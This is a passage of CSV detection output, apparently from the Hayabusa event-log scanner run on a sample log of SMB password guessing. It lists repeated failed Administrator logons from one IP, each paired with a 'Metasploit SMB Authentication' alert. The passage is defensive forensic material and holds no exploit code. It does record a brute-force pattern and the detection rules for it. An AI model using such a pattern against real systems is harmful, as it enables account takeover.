Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 